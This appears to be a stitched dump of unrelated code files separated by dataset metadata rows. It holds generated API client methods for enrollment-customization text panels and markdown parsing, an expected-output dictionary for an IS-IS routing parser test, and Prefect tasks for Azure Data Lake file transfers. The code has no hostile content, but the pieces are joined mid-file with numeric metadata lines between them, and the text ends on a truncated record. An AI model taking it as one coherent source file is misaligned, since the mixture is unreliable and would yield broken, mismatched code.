:rtype: GetEnrollmentCustomizationPanelText
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_post_with_http_info(id, enrollment_customization_panel_text, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_post_with_http_info(self, id, enrollment_customization_panel_text, **kwargs): # noqa: E501
"""Create a Text Panel for a single Enrollment Customization # noqa: E501
Create a Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_post_with_http_info(id, enrollment_customization_panel_text, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_text: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_text: EnrollmentCustomizationPanelText
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelText, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'enrollment_customization_panel_text'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_post`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_text' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_text' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_text'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_text` when calling `v1_enrollment_customization_id_text_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_text' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_text']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
201: "GetEnrollmentCustomizationPanelText",
400: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_parse_markdown_post(self, markdown, **kwargs): # noqa: E501
"""Parse the given string as markdown text and return Html output # noqa: E501
Parse the given string as markdown text and return Html output # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_parse_markdown_post(markdown, async_req=True)
>>> result = thread.get()
:param markdown: Enrollment Customization Panel to create (required)
:type markdown: Markdown
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: Markdown
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_parse_markdown_post_with_http_info(markdown, **kwargs) # noqa: E501
def v1_enrollment_customization_parse_markdown_post_with_http_info(self, markdown, **kwargs): # noqa: E501
"""Parse the given string as markdown text and return Html output # noqa: E501
Parse the given string as markdown text and return Html output # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_parse_markdown_post_with_http_info(markdown, async_req=True)
>>> result = thread.get()
:param markdown: Enrollment Customization Panel to create (required)
:type markdown: Markdown
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(Markdown, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'markdown'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_parse_markdown_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'markdown' is set
if self.api_client.client_side_validation and ('markdown' not in local_var_params or # noqa: E501
local_var_params['markdown'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `markdown` when calling `v1_enrollment_customization_parse_markdown_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'markdown' in local_var_params:
body_params = local_var_params['markdown']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "Markdown",
}
return self.api_client.call_api(
'/v1/enrollment-customization/parse-markdown', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 49.212407 | 342 | 0.620373 | 14,138 | 125,344 | 5.205616 | 0.017258 | 0.11188 | 0.055736 | 0.053562 | 0.984714 | 0.984565 | 0.983872 | 0.982051 | 0.982051 | 0.979116 | 0 | 0.014185 | 0.314383 | 125,344 | 2,546 | 343 | 49.231736 | 0.842212 | 0.473393 | 0 | 0.786596 | 0 | 0 | 0.212847 | 0.107062 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030864 | false | 0 | 0.004409 | 0 | 0.066138 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
96e1cc9f86a7b535bf9fb6d104db834c81cc19a4 | 10,302 | py | Python | src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_1_expected.py | hooligan-sa/genieparser | c0ce90ecb42a57c7ca299b633a62c461937c54c7 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_1_expected.py | hooligan-sa/genieparser | c0ce90ecb42a57c7ca299b633a62c461937c54c7 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_1_expected.py | hooligan-sa/genieparser | c0ce90ecb42a57c7ca299b633a62c461937c54c7 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"tag": {
"1": {
"prefix": {
"1.1.1.0": {
"subnet": "24",
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"via_interface": {
"Tunnel65537": {
"distance": 115,
"route_type": "L2",
"metric": 50,
"via_ip": "6.6.6.6",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 221,
"rtp_lsp_index": 221,
"rtp_lsp_version": 99
},
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
},
"GigabitEthernet0/0/3": {
"distance": 115,
"route_type": "L2",
"metric": 67108866,
"via_ip": "12.12.12.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 30,
"rtp_lsp_version": 2034
},
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
},
"TenGigabitEthernet0/0/5": {
"distance": 115,
"route_type": "L2",
"metric": 67108866,
"via_ip": "13.13.1.2",
"src_ip": "5.5.5.5",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 37,
"rtp_lsp_index": 13,
"rtp_lsp_version": 2055
},
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
},
"GigabitEthernet0/0/2": {
"distance": 115,
"route_type": "L2",
"metric": 67108866,
"via_ip": "12.12.1.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 30,
"rtp_lsp_version": 2034
},
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
}
}
},
"2.2.2.0": {
"subnet": "24",
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"via_interface": {
"GigabitEthernet0/0/2": {
"distance": 115,
"route_type": "L2",
"metric": 50331652,
"via_ip": "12.12.1.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 22,
"rtp_lsp_version": 2059
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000,
"installed": True
},
"GigabitEthernet0/0/3": {
"distance": 115,
"route_type": "L2",
"metric": 50331652,
"via_ip": "12.12.12.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 22,
"rtp_lsp_version": 2059
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000,
"installed": True
},
"TenGigabitEthernet0/0/5": {
"distance": 115,
"route_type": "L2",
"metric": 50331662,
"via_ip": "13.13.1.2",
"src_ip": "5.5.5.5",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 37,
"rtp_lsp_index": 14,
"rtp_lsp_version": 2058
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
}
}
},
"2.2.3.0": {
"subnet": "24",
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"via_interface": {
"GigabitEthernet0/0/2": {
"distance": 115,
"route_type": "L2",
"metric": 50331652,
"via_ip": "12.12.1.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 23,
"rtp_lsp_version": 2058
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000,
"installed": True
},
"GigabitEthernet0/0/3": {
"distance": 115,
"route_type": "L2",
"metric": 50331652,
"via_ip": "12.12.12.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 7,
"rtp_lsp_index": 23,
"rtp_lsp_version": 2058
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000,
"installed": True
},
"TenGigabitEthernet0/0/5": {
"distance": 115,
"route_type": "L2",
"metric": 50331662,
"via_ip": "13.13.1.2",
"src_ip": "5.5.5.5",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 37,
"rtp_lsp_index": 14,
"rtp_lsp_version": 2058
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": False
},
"srgb": 16000,
"srgb_range": 8000
}
}
}
}
}
}
} | 42.570248 | 58 | 0.225199 | 608 | 10,302 | 3.542763 | 0.100329 | 0.142061 | 0.022284 | 0.090529 | 0.96611 | 0.947075 | 0.934076 | 0.934076 | 0.934076 | 0.906685 | 0 | 0.132172 | 0.676859 | 10,302 | 242 | 59 | 42.570248 | 0.514869 | 0 | 0 | 0.760331 | 0 | 0 | 0.186159 | 0.006697 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
96e9c41394fe1cee7ffb30d5c0f117523c777d31 | 19,648 | py | Python | viadot/tasks/azure_data_lake.py | Lauralicja/viadot | 480df8ce8c7f9b9eab7d5f9646227316fc9eff49 | [
"MIT"
] | null | null | null | viadot/tasks/azure_data_lake.py | Lauralicja/viadot | 480df8ce8c7f9b9eab7d5f9646227316fc9eff49 | [
"MIT"
] | null | null | null | viadot/tasks/azure_data_lake.py | Lauralicja/viadot | 480df8ce8c7f9b9eab7d5f9646227316fc9eff49 | [
"MIT"
] | null | null | null | import json
import os
from datetime import timedelta
import pandas as pd
from prefect import Task
from prefect.tasks.secrets import PrefectSecret
from prefect.utilities.tasks import defaults_from_attrs
from ..sources import AzureDataLake
from .azure_key_vault import AzureKeyVaultSecret
class AzureDataLakeDownload(Task):
"""
Task for downloading data from the Azure Data lakes (gen1 and gen2).
Args:
from_path (str, optional): The path from which to download the file(s). Defaults to None.
to_path (str, optional): The destination path. Defaults to None.
recursive (bool, optional): Set this to true if downloading entire directories.
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to fetch the secret. Defaults to None.
max_retries (int, optional): [description]. Defaults to 3.
retry_delay (timedelta, optional): [description]. Defaults to timedelta(seconds=10).
"""
def __init__(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = False,
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
self.from_path = from_path
self.to_path = to_path
self.recursive = recursive
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_download",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
def __call__(self, *args, **kwargs):
"""Download file(s) from the Azure Data Lake"""
return super().__call__(*args, **kwargs)
@defaults_from_attrs(
"from_path",
"to_path",
"recursive",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> None:
"""Task run method.
Args:
from_path (str): The path from which to download the file(s).
to_path (str): The destination path.
recursive (bool): Set this to true if downloading entire directories.
gen (int): The generation of the Azure Data Lake.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
file_name = from_path.split("/")[-1]
to_path = to_path or file_name
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials)
full_dl_path = os.path.join(credentials["ACCOUNT_NAME"], from_path)
self.logger.info(f"Downloading data from {full_dl_path} to {to_path}...")
lake.download(from_path=from_path, to_path=to_path, recursive=recursive)
self.logger.info(f"Successfully downloaded data to {to_path}.")
class AzureDataLakeUpload(Task):
"""Upload file(s) to Azure Data Lake.
Args:
from_path (str, optional): The local path from which to upload the file(s). Defaults to None.
to_path (str, optional): The destination path. Defaults to None.
recursive (bool, optional): Set this to true if uploading entire directories. Defaults to False.
overwrite (bool, optional): Whether to overwrite files in the lake. Defaults to False.
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
def __init__(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = False,
overwrite: bool = False,
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
self.from_path = from_path
self.to_path = to_path
self.recursive = recursive
self.overwrite = overwrite
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_upload",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
def __call__(self, *args, **kwargs):
"""Upload file(s) to the Azure Data Lake"""
return super().__call__(*args, **kwargs)
@defaults_from_attrs(
"from_path",
"to_path",
"recursive",
"overwrite",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = None,
overwrite: bool = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> None:
"""Task run method.
Args:
from_path (str): The path from which to upload the file(s).
to_path (str): The destination path.
recursive (bool): Set to true if uploading entire directories.
overwrite (bool): Whether to overwrite the file(s) if they exist.
gen (int): The generation of the Azure Data Lake.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials)
full_to_path = os.path.join(credentials["ACCOUNT_NAME"], to_path)
self.logger.info(f"Uploading data from {from_path} to {full_to_path}...")
lake.upload(
from_path=from_path,
to_path=to_path,
recursive=recursive,
overwrite=overwrite,
)
self.logger.info(f"Successfully uploaded data to {full_to_path}.")
class AzureDataLakeToDF(Task):
def __init__(
self,
path: str = None,
sep: str = "\t",
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
"""Load file(s) from the Azure Data Lake to a pandas DataFrame.
Currently supports CSV and parquet files.
Args:
path (str, optional): The path from which to load the DataFrame. Defaults to None.
sep (str, optional): The separator to use when reading a CSV file. Defaults to "\t".
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
self.path = path
self.sep = sep
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_to_df",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
def __call__(self, *args, **kwargs):
"""Load file(s) from the Azure Data Lake to a pandas DataFrame."""
return super().__call__(*args, **kwargs)
@defaults_from_attrs(
"path",
"sep",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
path: str = None,
sep: str = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> pd.DataFrame:
"""Task run method.
Args:
path (str): The path to file(s) which should be loaded into a DataFrame.
sep (str): The field separator to use when loading the file to the DataFrame.
gen (int): The generation of the Azure Data Lake.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
if path is None:
raise ValueError("Please provide the path to the file to be downloaded.")
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials, path=path)
full_dl_path = os.path.join(credentials["ACCOUNT_NAME"], path)
self.logger.info(f"Downloading data from {full_dl_path} to a DataFrame...")
df = lake.to_df(sep=sep)
self.logger.info(f"Successfully loaded data.")
return df
class AzureDataLakeCopy(Task):
"""
Task for copying data between the Azure Data lakes files.
Args:
from_path (str, optional): The path from which to copy the file(s). Defaults to None.
to_path (str, optional): The destination path. Defaults to None.
recursive (bool, optional): Set this to true if copy entire directories.
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to fetch the secret. Defaults to None.
max_retries (int, optional): [description]. Defaults to 3.
retry_delay (timedelta, optional): [description]. Defaults to timedelta(seconds=10).
"""
def __init__(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = False,
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
self.from_path = from_path
self.to_path = to_path
self.recursive = recursive
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_copy",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
def __call__(self, *args, **kwargs):
"""Copy file(s) from the Azure Data Lake"""
return super().__call__(*args, **kwargs)
@defaults_from_attrs(
"from_path",
"to_path",
"recursive",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
from_path: str = None,
to_path: str = None,
recursive: bool = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> None:
"""Task run method.
Args:
from_path (str): The path from which to copy the file(s).
to_path (str): The destination path.
recursive (bool): Set this to true if copying entire directories.
gen (int): The generation of the Azure Data Lake.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
file_name = from_path.split("/")[-1]
to_path = to_path or file_name
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials)
full_dl_path = os.path.join(credentials["ACCOUNT_NAME"], from_path)
self.logger.info(f"Copying data from {full_dl_path} to {to_path}...")
lake.cp(from_path=from_path, to_path=to_path, recursive=recursive)
self.logger.info(f"Successfully copied data to {to_path}.")
class AzureDataLakeList(Task):
"""
Task for listing files in Azure Data Lake.
Args:
path (str, optional): The path to the directory which contents you want to list. Defaults to None.
gen (int, optional): The generation of the Azure Data Lake. Defaults to 2.
vault_name (str, optional): The name of the vault from which to fetch the secret. Defaults to None.
max_retries (int, optional): [description]. Defaults to 3.
retry_delay (timedelta, optional): [description]. Defaults to timedelta(seconds=10).
"""
def __init__(
self,
path: str = None,
gen: int = 2,
vault_name: str = None,
max_retries: int = 3,
retry_delay: timedelta = timedelta(seconds=10),
*args,
**kwargs,
):
self.path = path
self.gen = gen
self.vault_name = vault_name
super().__init__(
name="adls_list",
max_retries=max_retries,
retry_delay=retry_delay,
*args,
**kwargs,
)
@defaults_from_attrs(
"path",
"gen",
"vault_name",
"max_retries",
"retry_delay",
)
def run(
self,
path: str = None,
gen: int = None,
sp_credentials_secret: str = None,
vault_name: str = None,
max_retries: int = None,
retry_delay: timedelta = None,
) -> None:
"""Task run method.
Args:
from_path (str): The path to the directory which contents you want to list. Defaults to None.
gen (int): The generation of the Azure Data Lake. Defaults to None.
sp_credentials_secret (str, optional): The name of the Azure Key Vault secret containing a dictionary with
ACCOUNT_NAME and Service Principal credentials (TENANT_ID, CLIENT_ID, CLIENT_SECRET). Defaults to None.
vault_name (str, optional): The name of the vault from which to obtain the secret. Defaults to None.
"""
if not sp_credentials_secret:
# attempt to read a default for the service principal secret name
try:
sp_credentials_secret = PrefectSecret(
"AZURE_DEFAULT_ADLS_SERVICE_PRINCIPAL_SECRET"
).run()
except ValueError:
pass
if sp_credentials_secret:
azure_secret_task = AzureKeyVaultSecret()
credentials_str = azure_secret_task.run(
secret=sp_credentials_secret, vault_name=vault_name
)
credentials = json.loads(credentials_str)
else:
credentials = {
"ACCOUNT_NAME": os.environ["AZURE_ACCOUNT_NAME"],
"AZURE_TENANT_ID": os.environ["AZURE_TENANT_ID"],
"AZURE_CLIENT_ID": os.environ["AZURE_CLIENT_ID"],
"AZURE_CLIENT_SECRET": os.environ["AZURE_CLIENT_SECRET"],
}
lake = AzureDataLake(gen=gen, credentials=credentials)
full_dl_path = os.path.join(credentials["ACCOUNT_NAME"], path)
self.logger.info(f"Listing files in {full_dl_path}...")
files = lake.ls(path)
self.logger.info(f"Successfully listed files in {full_dl_path}.")
return files
| 36.794007 | 118 | 0.595786 | 2,333 | 19,648 | 4.800686 | 0.070724 | 0.036161 | 0.050893 | 0.021429 | 0.880089 | 0.862946 | 0.847232 | 0.844018 | 0.834911 | 0.825536 | 0 | 0.002831 | 0.316775 | 19,648 | 533 | 119 | 36.863039 | 0.831496 | 0.316521 | 0 | 0.801075 | 0 | 0 | 0.135011 | 0.016798 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037634 | false | 0.013441 | 0.024194 | 0 | 0.091398 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8c1ce821aa451bfca27433056700e5a2383f1521 | 11,087 | py | Python | backend/tests/functional_tests/test_adding_new_label.py | kolszewska/MedTagger | c691c822dd23a9fb402d1314e7fe2e6bde898e9c | [
"Apache-2.0"
] | 71 | 2019-01-31T19:50:31.000Z | 2022-02-20T07:36:49.000Z | backend/tests/functional_tests/test_adding_new_label.py | kolszewska/MedTagger | c691c822dd23a9fb402d1314e7fe2e6bde898e9c | [
"Apache-2.0"
